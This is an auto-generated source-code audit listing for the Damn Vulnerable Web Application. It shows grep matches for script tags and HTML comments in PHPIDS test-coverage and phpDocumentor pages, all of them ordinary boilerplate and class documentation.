Highlighting: On | Off
Show: All | OK | Dubious | Bad

Damn Vulnerable Web Application

Source Code Audit - 2013-03-11
Prepared for Enzo's Pizza

Your browser does not support HTML 5 Local Storage. Your work will not be saved.

html

<script (22) Top | Hide

./external/phpids/0.6/tests/coverage/Caching_Factory.php.html:9 (1/22) OK | Dubious | Bad | Hide
7-    <link rel="stylesheet" type="text/css" href="style.css">
8-    <link rel="stylesheet" type="text/css" href="container.css">
9:    <script type="text/javascript" src="yahoo-dom-event.js"></script>
10:    <script type="text/javascript" src="container-min.js"></script>
11-  </head>
12-
13-  <body class="yui-skin-sam">
./external/phpids/0.6/tests/coverage/Caching_Factory.php.html:261 (2/22) OK | Dubious | Bad | Hide
258-
259-    <br />
260-
261:    <script language="javascript">
262-      $E = YAHOO.util.Event;
263-      YAHOO.namespace("phpunit.container");
264-      YAHOO.phpunit.container.panelsData = {
./external/phpids/0.6/tests/coverage/Caching_File.php.html:9 (3/22) OK | Dubious | Bad | Hide
6-    <title>PHPIDS</title>
7-    <link rel="stylesheet" type="text/css" href="style.css">
8-    <link rel="stylesheet" type="text/css" href="container.css">
9:    <script type="text/javascript" src="yahoo-dom-event.js"></script>
10:    <script type="text/javascript" src="container-min.js"></script>
11-  </head>
12-
13-  <body class="yui-skin-sam">
./external/phpids/0.6/tests/coverage/Caching_File.php.html:456 (4/22) OK | Dubious | Bad | Hide
453-
454-    <br />
455-
456:    <script language="javascript">
457-      $E = YAHOO.util.Event;
458-      YAHOO.namespace("phpunit.container");
459-      YAHOO.phpunit.container.panelsData = {
./external/phpids/0.6/tests/coverage/Filter.php.html:9 (5/22) OK | Dubious | Bad | Hide
6-    <title>PHPIDS</title>
7-    <link rel="stylesheet" type="text/css" href="style.css">
8-    <link rel="stylesheet" type="text/css" href="container.css">
9:    <script type="text/javascript" src="yahoo-dom-event.js"></script>
10:    <script type="text/javascript" src="container-min.js"></script>
11-  </head>
12-
13-  <body class="yui-skin-sam">
./external/phpids/0.6/tests/coverage/Filter.php.html:486 (6/22) OK | Dubious | Bad | Hide
483-
484-    <br />
485-
486:    <script language="javascript">
487-      $E = YAHOO.util.Event;
488-      YAHOO.namespace("phpunit.container");
489-      YAHOO.phpunit.container.panelsData = {
./external/phpids/0.6/tests/coverage/Caching_Session.php.html:9 (7/22) OK | Dubious | Bad | Hide
6-    <title>PHPIDS</title>
7-    <link rel="stylesheet" type="text/css" href="style.css">
8-    <link rel="stylesheet" type="text/css" href="container.css">
9:    <script type="text/javascript" src="yahoo-dom-event.js"></script>
10:    <script type="text/javascript" src="container-min.js"></script>
11-  </head>
12-
13-  <body class="yui-skin-sam">
./external/phpids/0.6/tests/coverage/Caching_Session.php.html:380 (8/22) OK | Dubious | Bad | Hide
377-
378-    <br />
379-
380:    <script language="javascript">
381-      $E = YAHOO.util.Event;
382-      YAHOO.namespace("phpunit.container");
383-      YAHOO.phpunit.container.panelsData = {
./external/phpids/0.6/tests/coverage/Converter.php.html:9 (9/22) OK | Dubious | Bad | Hide
6-    <title>PHPIDS</title>
7-    <link rel="stylesheet" type="text/css" href="style.css">
8-    <link rel="stylesheet" type="text/css" href="container.css">
9:    <script type="text/javascript" src="yahoo-dom-event.js"></script>
10:    <script type="text/javascript" src="container-min.js"></script>
11-  </head>
12-
13-  <body class="yui-skin-sam">
./external/phpids/0.6/tests/coverage/Converter.php.html:1230 (10/22) OK | Dubious | Bad | Hide
1227-
1228-    <br />
1229-
1230:    <script language="javascript">
1231-      $E = YAHOO.util.Event;
1232-      YAHOO.namespace("phpunit.container");
1233-      YAHOO.phpunit.container.panelsData = {
./external/phpids/0.6/tests/coverage/Event.php.html:9 (11/22) OK | Dubious | Bad | Hide
6-    <title>PHPIDS</title>
7-    <link rel="stylesheet" type="text/css" href="style.css">
8-    <link rel="stylesheet" type="text/css" href="container.css">
9:    <script type="text/javascript" src="yahoo-dom-event.js"></script>
10:    <script type="text/javascript" src="container-min.js"></script>
11-  </head>
12-
13-  <body class="yui-skin-sam">
./external/phpids/0.6/tests/coverage/Event.php.html:557 (12/22) OK | Dubious | Bad | Hide
554-
555-    <br />
556-
557:    <script language="javascript">
558-      $E = YAHOO.util.Event;
559-      YAHOO.namespace("phpunit.container");
560-      YAHOO.phpunit.container.panelsData = {
./external/phpids/0.6/tests/coverage/Caching_Interface.php.html:9 (13/22) OK | Dubious | Bad | Hide
6-    <title>PHPIDS</title>
7-    <link rel="stylesheet" type="text/css" href="style.css">
8-    <link rel="stylesheet" type="text/css" href="container.css">
9:    <script type="text/javascript" src="yahoo-dom-event.js"></script>
10:    <script type="text/javascript" src="container-min.js"></script>
11-  </head>
12-
13-  <body class="yui-skin-sam">
./external/phpids/0.6/tests/coverage/Caching_Interface.php.html:187 (14/22) OK | Dubious | Bad | Hide
184-
185-    <br />
186-
187:    <script language="javascript">
188-      $E = YAHOO.util.Event;
189-      YAHOO.namespace("phpunit.container");
190-      YAHOO.phpunit.container.panelsData = {
./external/phpids/0.6/tests/coverage/Monitor.php.html:9 (15/22) OK | Dubious | Bad | Hide
6-    <title>PHPIDS</title>
7-    <link rel="stylesheet" type="text/css" href="style.css">
8-    <link rel="stylesheet" type="text/css" href="container.css">
9:    <script type="text/javascript" src="yahoo-dom-event.js"></script>
10:    <script type="text/javascript" src="container-min.js"></script>
11-  </head>
12-
13-  <body class="yui-skin-sam">
./external/phpids/0.6/tests/coverage/Monitor.php.html:1245 (16/22) OK | Dubious | Bad | Hide
1242-
1243-    <br />
1244-
1245:    <script language="javascript">
1246-      $E = YAHOO.util.Event;
1247-      YAHOO.namespace("phpunit.container");
1248-      YAHOO.phpunit.container.panelsData = {
./external/phpids/0.6/tests/coverage/Init.php.html:9 (17/22) OK | Dubious | Bad | Hide
6-    <title>PHPIDS</title>
7-    <link rel="stylesheet" type="text/css" href="style.css">
8-    <link rel="stylesheet" type="text/css" href="container.css">
9:    <script type="text/javascript" src="yahoo-dom-event.js"></script>
10:    <script type="text/javascript" src="container-min.js"></script>
11-  </head>
12-
13-  <body class="yui-skin-sam">
./external/phpids/0.6/tests/coverage/Init.php.html:576 (18/22) OK | Dubious | Bad | Hide
573-
574-    <br />
575-
576:    <script language="javascript">
577-      $E = YAHOO.util.Event;
578-      YAHOO.namespace("phpunit.container");
579-      YAHOO.phpunit.container.panelsData = {
./external/phpids/0.6/tests/coverage/Report.php.html:9 (19/22) OK | Dubious | Bad | Hide
6-    <title>PHPIDS</title>
7-    <link rel="stylesheet" type="text/css" href="style.css">
8-    <link rel="stylesheet" type="text/css" href="container.css">
9:    <script type="text/javascript" src="yahoo-dom-event.js"></script>
10:    <script type="text/javascript" src="container-min.js"></script>
11-  </head>
12-
13-  <body class="yui-skin-sam">
./external/phpids/0.6/tests/coverage/Report.php.html:774 (20/22) OK | Dubious | Bad | Hide
771-
772-    <br />
773-
774:    <script language="javascript">
775-      $E = YAHOO.util.Event;
776-      YAHOO.namespace("phpunit.container");
777-      YAHOO.phpunit.container.panelsData = {
./external/phpids/0.6/tests/coverage/Filter_Storage.php.html:9 (21/22) OK | Dubious | Bad | Hide
6-    <title>PHPIDS</title>
7-    <link rel="stylesheet" type="text/css" href="style.css">
8-    <link rel="stylesheet" type="text/css" href="container.css">
9:    <script type="text/javascript" src="yahoo-dom-event.js"></script>
10:    <script type="text/javascript" src="container-min.js"></script>
11-  </head>
12-
13-  <body class="yui-skin-sam">
./external/phpids/0.6/tests/coverage/Filter_Storage.php.html:683 (22/22) OK | Dubious | Bad | Hide
680-
681-    <br />
682-
683:    <script language="javascript">
684-      $E = YAHOO.util.Event;
685-      YAHOO.namespace("phpunit.container");
686-      YAHOO.phpunit.container.panelsData = {

<!-- (257) Top | Hide

./external/phpids/0.6/docs/phpdocumentor/packages.html:5 (1/257) OK | Dubious | Bad | Hide
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title></title>
7-			<link rel="stylesheet" href="media/stylesheet.css" />
8-			<link rel="stylesheet" href="media/banner.css" />
./external/phpids/0.6/docs/phpdocumentor/elementindex_PHPIDS.html:5 (2/257) OK | Dubious | Bad | Hide
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title></title>
7-			<link rel="stylesheet" href="media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/classtrees_PHPIDS.html:5 (3/257) OK | Dubious | Bad | Hide
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title></title>
7-			<link rel="stylesheet" href="media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
9-		</head>
10-		<body>
11-						
12:<!-- Start of Class Data -->
13-<H2>
14-	
15-</H2>
./external/phpids/0.6/docs/phpdocumentor/errors.html:5 (4/257) OK | Dubious | Bad | Hide
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>phpDocumentor Parser Errors and Warnings</title>
7-			<link rel="stylesheet" href="media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/elementindex.html:5 (5/257) OK | Dubious | Bad | Hide
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title></title>
7-			<link rel="stylesheet" href="media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/index.html:7 (6/257) OK | Dubious | Bad | Hide
4-     "http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd">
5-   <html xmlns="http://www.w3.org/1999/xhtml">
6-<head>
7:	<!-- Generated by phpDocumentor on Mon, 22 Dec 2008 13:36:38 +0100  -->
8-  <title>Generated Documentation</title>
9-  <meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
10-</head>
./external/phpids/0.6/docs/phpdocumentor/li_PHPIDS.html:5 (7/257) OK | Dubious | Bad | Hide
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title></title>
7-			<link rel="stylesheet" href="media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_Database.html:5 (8/257) OK | Dubious | Bad | Hide
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs For Class IDS_Caching_Database</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_Database.html:28 (9/257) OK | Dubious | Bad | Hide
25-            <ul>
26-                <li><a href="../PHPIDS/IDS_Caching_Interface.html">IDS_Caching_Interface</a></li>            </ul>
27-        </p>
28:        		<!-- ========== Info from phpDoc block ========= -->
29-<p class="short-description">Database caching wrapper</p>
30-<p class="description"><p>This class inhabits functionality to get and set cache via a database.</p></p>
31-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_Database.html:99 (10/257) OK | Dubious | Bad | Hide
96-		</div>
97-		<div class="info-box-body">
98-			<A NAME='method_detail'></A>
99:<a name="methodgetInstance" id="getInstance"><!-- --></a>
100-<div class="evenrow">
101-	
102-	<div class="method-header">
103-		<span class="method-title">static method getInstance</span> (line <span class="line-number">129</span>)
104-	</div> 
105-	
106:	<!-- ========== Info from phpDoc block ========= -->
107-<p class="short-description">Returns an instance of this class</p>
108-	<ul class="tags">
109-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_Database.html:133 (11/257) OK | Dubious | Bad | Hide
130-			
131-	</div>
132-
133:<a name="method__construct" id="__construct"><!-- --></a>
134-<div class="oddrow">
135-	
136-	<div class="method-header">
137-		<span class="method-title">Constructor __construct</span> (line <span class="line-number">113</span>)
138-	</div> 
139-	
140:	<!-- ========== Info from phpDoc block ========= -->
141-<p class="short-description">Constructor</p>
142-<p class="description"><p>Connects to database.</p></p>
143-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_Database.html:166 (12/257) OK | Dubious | Bad | Hide
163-		
164-			
165-	</div>
166:<a name="methodgetCache" id="getCache"><!-- --></a>
167-<div class="evenrow">
168-	
169-	<div class="method-header">
170-		<span class="method-title">getCache</span> (line <span class="line-number">181</span>)
171-	</div> 
172-	
173:	<!-- ========== Info from phpDoc block ========= -->
174-<p class="short-description">Returns the cached data</p>
175-<p class="description"><p>Note that this method returns false if either type or file cache is  not set</p></p>
176-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_Database.html:199 (13/257) OK | Dubious | Bad | Hide
196-					</dl>
197-			
198-	</div>
199:<a name="methodsetCache" id="setCache"><!-- --></a>
200-<div class="oddrow">
201-	
202-	<div class="method-header">
203-		<span class="method-title">setCache</span> (line <span class="line-number">146</span>)
204-	</div> 
205-	
206:	<!-- ========== Info from phpDoc block ========= -->
207-<p class="short-description">Writes cache data into the database</p>
208-	<ul class="tags">
209-				<li><span class="field">throws:</span> PDOException if a db error occurred</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Filter---Storage---Abstract.php.html:5 (14/257) OK | Dubious | Bad | Hide
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs for page Abstract.php</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Filter---Storage---Abstract.php.html:22 (15/257) OK | Dubious | Bad | Hide
19-							<a href="#sec-classes">Classes</a>
20-														</div>
21-	<div class="info-box-body">	
22:		<!-- ========== Info from phpDoc block ========= -->
23-<p class="short-description">PHPIDS</p>
24-<p class="description"><p>Requirements: PHP5, SimpleXML</p><p>Copyright (c) 2007 PHPIDS (http://php-ids.org)</p><p>This program is free software; you can redistribute it and/or modify  it under the terms of the GNU General Public License as published by  the Free Software Foundation; version 2 of the license.</p><p>This program is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the  GNU General Public License for more details.</p></p>
25-
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Caching---Database.php.html:5 (16/257) OK | Dubious | Bad | Hide
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs for page Database.php</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Caching---Database.php.html:23 (17/257) OK | Dubious | Bad | Hide
20-			|							<a href="#sec-includes">Includes</a>
21-												</div>
22-	<div class="info-box-body">	
23:		<!-- ========== Info from phpDoc block ========= -->
24-<p class="short-description">PHPIDS</p>
25-<p class="description"><p>Requirements: PHP5, SimpleXML</p><p>Copyright (c) 2008 PHPIDS group (http://php-ids.org)</p><p>PHPIDS is free software; you can redistribute it and/or modify  it under the terms of the GNU Lesser General Public License as published by  the Free Software Foundation, version 3 of the License, or  (at your option) any later version.</p><p>PHPIDS is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  GNU Lesser General Public License for more details.</p><p>You should have received a copy of the GNU Lesser General Public License  along with PHPIDS. If not, see &lt;http://www.gnu.org/licenses/&gt;.</p><p>PHP version 5.1.6+</p></p>
26-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Caching---Database.php.html:72 (18/257) OK | Dubious | Bad | Hide
69-				|						<span class="disabled">Includes</span>
70-														</div>
71-		<div class="info-box-body">	
72:			<a name="_IDS/Caching/Interface_php"><!-- --></a>
73-<div class="evenrow">
74-	
75-	<div>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Caching---Database.php.html:83 (19/257) OK | Dubious | Bad | Hide
80-		</span>
81-	</div>
82-
83:	<!-- ========== Info from phpDoc block ========= -->
84-<p class="short-description">PHPIDS</p>
85-<p class="description"><p>Requirements: PHP5, SimpleXML</p><p>Copyright (c) 2008 PHPIDS group (http://php-ids.org)</p><p>PHPIDS is free software; you can redistribute it and/or modify  it under the terms of the GNU Lesser General Public License as published by  the Free Software Foundation, version 3 of the License, or  (at your option) any later version.</p><p>PHPIDS is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  GNU Lesser General Public License for more details.</p><p>You should have received a copy of the GNU Lesser General Public License  along with PHPIDS. If not, see &lt;http://www.gnu.org/licenses/&gt;.</p><p>PHP version 5.1.6+</p></p>
86-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Filter.php.html:5 (20/257) OK | Dubious | Bad | Hide
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs for page Filter.php</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Filter.php.html:22 (21/257) OK | Dubious | Bad | Hide
19-							<a href="#sec-classes">Classes</a>
20-														</div>
21-	<div class="info-box-body">	
22:		<!-- ========== Info from phpDoc block ========= -->
23-<p class="short-description">PHPIDS</p>
24-<p class="description"><p>Requirements: PHP5, SimpleXML</p><p>Copyright (c) 2008 PHPIDS group (http://php-ids.org)</p><p>PHPIDS is free software; you can redistribute it and/or modify  it under the terms of the GNU Lesser General Public License as published by  the Free Software Foundation, version 3 of the License, or  (at your option) any later version.</p><p>PHPIDS is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  GNU Lesser General Public License for more details.</p><p>You should have received a copy of the GNU Lesser General Public License  along with PHPIDS. If not, see &lt;http://www.gnu.org/licenses/&gt;.</p><p>PHP version 5.1.6+</p></p>
25-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_File.html:5 (22/257) OK | Dubious | Bad | Hide
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs For Class IDS_Log_File</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_File.html:28 (23/257) OK | Dubious | Bad | Hide
25-            <ul>
26-                <li><a href="../PHPIDS/IDS_Log_Interface.html">IDS_Log_Interface</a></li>            </ul>
27-        </p>
28:        		<!-- ========== Info from phpDoc block ========= -->
29-<p class="short-description">File logging wrapper</p>
30-<p class="description"><p>The file wrapper is designed to store data into a flatfile. It implements the  singleton pattern.</p></p>
31-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_File.html:98 (24/257) OK | Dubious | Bad | Hide
95-		</div>
96-		<div class="info-box-body">
97-			<A NAME='method_detail'></A>
98:<a name="methodgetInstance" id="getInstance"><!-- --></a>
99-<div class="evenrow">
100-	
101-	<div class="method-header">
102-		<span class="method-title">static method getInstance</span> (line <span class="line-number">110</span>)
103-	</div> 
104-	
105:	<!-- ========== Info from phpDoc block ========= -->
106-<p class="short-description">Returns an instance of this class</p>
107-<p class="description"><p>This method allows the passed argument to be either an instance of  IDS_Init or a path to a log file. Due to the singleton pattern only one  instance for each file can be initiated.</p></p>
108-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_File.html:130 (25/257) OK | Dubious | Bad | Hide
127-			
128-	</div>
129-
130:<a name="method__construct" id="__construct"><!-- --></a>
131-<div class="oddrow">
132-	
133-	<div class="method-header">
134-		<span class="method-title">Constructor __construct</span> (line <span class="line-number">86</span>)
135-	</div> 
136-	
137:	<!-- ========== Info from phpDoc block ========= -->
138-<p class="short-description">Constructor</p>
139-	<ul class="tags">
140-				<li><span class="field">access:</span> protected</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_File.html:159 (26/257) OK | Dubious | Bad | Hide
156-		
157-			
158-	</div>
159:<a name="methodexecute" id="execute"><!-- --></a>
160-<div class="evenrow">
161-	
162-	<div class="method-header">
163-		<span class="method-title">execute</span> (line <span class="line-number">184</span>)
164-	</div> 
165-	
166:	<!-- ========== Info from phpDoc block ========= -->
167-<p class="short-description">Stores given data into a file</p>
168-	<ul class="tags">
169-				<li><span class="field">throws:</span> Exception if the logfile isn't writeable</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_File.html:195 (27/257) OK | Dubious | Bad | Hide
192-					</dl>
193-			
194-	</div>
195:<a name="methodprepareData" id="prepareData"><!-- --></a>
196-<div class="oddrow">
197-	
198-	<div class="method-header">
199-		<span class="method-title">prepareData</span> (line <span class="line-number">146</span>)
200-	</div> 
201-	
202:	<!-- ========== Info from phpDoc block ========= -->
203-<p class="short-description">Prepares data</p>
204-<p class="description"><p>Converts given data into a format that can be stored into a file.  You might edit this method to your requirements.</p></p>
205-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Init.html:5 (28/257) OK | Dubious | Bad | Hide
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs For Class IDS_Init</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Init.html:24 (29/257) OK | Dubious | Bad | Hide
21-						
22-					</div>
23-	<div class="info-box-body">
24:        		<!-- ========== Info from phpDoc block ========= -->
25-<p class="short-description">Framework initiation</p>
26-<p class="description"><p>This class is used for the purpose to initiate the framework and inhabits  functionality to parse the needed configuration file.</p></p>
27-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Init.html:139 (30/257) OK | Dubious | Bad | Hide
136-							
137-					</div>
138-		<div class="info-box-body">
139:			<a name="var$config" id="$config"><!-- --></A>
140-<div class="oddrow">
141-
142-	<div class="var-header">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Init.html:150 (31/257) OK | Dubious | Bad | Hide
147-		</span>
148-	</div>
149-
150:	<!-- ========== Info from phpDoc block ========= -->
151-<p class="short-description">Holds config settings</p>
152-	<ul class="tags">
153-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Init.html:176 (32/257) OK | Dubious | Bad | Hide
173-		</div>
174-		<div class="info-box-body">
175-			<A NAME='method_detail'></A>
176:<a name="methodinit" id="init"><!-- --></a>
177-<div class="evenrow">
178-	
179-	<div class="method-header">
180-		<span class="method-title">static method init</span> (line <span class="line-number">115</span>)
181-	</div> 
182-	
183:	<!-- ========== Info from phpDoc block ========= -->
184-<p class="short-description">Returns an instance of this class. Also a PHP version check  is being performed to avoid compatibility problems with PHP &lt; 5.1.6</p>
185-	<ul class="tags">
186-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Init.html:207 (33/257) OK | Dubious | Bad | Hide
204-			
205-	</div>
206-
207:<a name="methodgetBasePath" id="getBasePath"><!-- --></a>
208-<div class="oddrow">
209-	
210-	<div class="method-header">
211-		<span class="method-title">getBasePath</span> (line <span class="line-number">161</span>)
212-	</div> 
213-	
214:	<!-- ========== Info from phpDoc block ========= -->
215-<p class="short-description">This method checks if a base path is given and usage is set to true.</p>
216-<p class="description"><p>If all that tests succeed the base path will be returned as a string -  else null will be returned.</p></p>
217-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Init.html:233 (34/257) OK | Dubious | Bad | Hide
230-		
231-			
232-	</div>
233:<a name="methodgetConfig" id="getConfig"><!-- --></a>
234-<div class="evenrow">
235-	
236-	<div class="method-header">
237-		<span class="method-title">getConfig</span> (line <span class="line-number">220</span>)
238-	</div> 
239-	
240:	<!-- ========== Info from phpDoc block ========= -->
241-<p class="short-description">Returns the config array</p>
242-	<ul class="tags">
243-				<li><span class="field">return:</span> the config array</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Init.html:258 (35/257) OK | Dubious | Bad | Hide
255-		
256-			
257-	</div>
258:<a name="methodgetConfigPath" id="getConfigPath"><!-- --></a>
259-<div class="oddrow">
260-	
261-	<div class="method-header">
262-		<span class="method-title">getConfigPath</span> (line <span class="line-number">149</span>)
263-	</div> 
264-	
265:	<!-- ========== Info from phpDoc block ========= -->
266-<p class="short-description">Returns path to configuration file</p>
267-	<ul class="tags">
268-				<li><span class="field">return:</span> the config path</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Init.html:283 (36/257) OK | Dubious | Bad | Hide
280-		
281-			
282-	</div>
283:<a name="methodsetConfig" id="setConfig"><!-- --></a>
284-<div class="evenrow">
285-	
286-	<div class="method-header">
287-		<span class="method-title">setConfig</span> (line <span class="line-number">178</span>)
288-	</div> 
289-	
290:	<!-- ========== Info from phpDoc block ========= -->
291-<p class="short-description">Merges new settings into the exsiting ones or overwrites them</p>
292-	<ul class="tags">
293-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Init.html:315 (37/257) OK | Dubious | Bad | Hide
312-		
313-			
314-	</div>
315:<a name="methodsetConfigPath" id="setConfigPath"><!-- --></a>
316-<div class="oddrow">
317-	
318-	<div class="method-header">
319-		<span class="method-title">setConfigPath</span> (line <span class="line-number">132</span>)
320-	</div> 
321-	
322:	<!-- ========== Info from phpDoc block ========= -->
323-<p class="short-description">Sets the path to the configuration file</p>
324-	<ul class="tags">
325-				<li><span class="field">throws:</span> Exception if file not found</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Init.html:345 (38/257) OK | Dubious | Bad | Hide
342-		
343-			
344-	</div>
345:<a name="method_mergeConfig" id="_mergeConfig"><!-- --></a>
346-<div class="evenrow">
347-	
348-	<div class="method-header">
349-		<span class="method-title">_mergeConfig</span> (line <span class="line-number">198</span>)
350-	</div> 
351-	
352:	<!-- ========== Info from phpDoc block ========= -->
353-<p class="short-description">Merge config hashes recursivly</p>
354-<p class="description"><p>The algorithm merges configuration arrays recursively. If an element is  an array in both, the values will be appended. If it is a scalar in both,  the value will be replaced.</p></p>
355-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Init.html:379 (39/257) OK | Dubious | Bad | Hide
376-		
377-			
378-	</div>
379:<a name="method__clone" id="__clone"><!-- --></a>
380-<div class="oddrow">
381-	
382-	<div class="method-header">
383-		<span class="method-title">__clone</span> (line <span class="line-number">103</span>)
384-	</div> 
385-	
386:	<!-- ========== Info from phpDoc block ========= -->
387-<p class="short-description">Permitting to clone this object</p>
388-<p class="description"><p>For the sake of correctness of a singleton pattern, this is necessary</p></p>
389-	<ul class="tags">
